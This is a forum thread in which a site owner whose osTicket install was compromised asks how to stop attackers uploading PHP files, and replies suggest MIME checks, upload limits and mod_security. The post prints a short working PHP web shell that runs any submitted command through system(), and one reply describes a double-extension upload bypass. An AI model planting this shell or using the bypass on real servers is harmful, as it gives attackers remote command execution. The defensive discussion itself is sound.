| SitePoint Sponsor |
Hey, I was osticket and somebody had uploaded a PHP file that gave them command line access
they used a similar script to this i think
after a quick browse on the net. What I want to know is how can i stop this happening again. I have disabled all uploads through osticket so that should stop it for now.PHP Code:<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>
Thanks for any help
You can just validate what type of file is being uploaded onto your system by checking the mime type and only allowing certain type like:
images/jpegs
Originally Posted by bloo_fish
But is there a way to disable php, perl etc from being able to do this, preferable through apache so it can stop all languages to doing it.
Thanks for the response though
Stop PHP and Perl being able to do what? Check MIME types?
You may wanna take a look at this http://au.php.net/ini-set
Set it to 0m as you cannot turn file uploads without php.ini or httpd.conf access.
Thankyou for the respons, but what exactly do i set to 0m?
I have also found http://www.modsecurity.org/ which looks like it sets apache to only allow uploads of image file types
thanks for the modsecurity link. Some nice articles on security there too.
alot of people use
$var = explode(".", $var);
$filetype = $var[1];
this is what so many people use but think about it
if i put test.jpg.php
it will pass threw easily , so you should replace the .php , .cgi,.pl etc etc.
Linux Server Management - AdminGeekZ.com
Is your website Sluggish? Unavailable? Insecure?
Why not call us? +44 0141 2800134
Posting Permissions
Bookmarks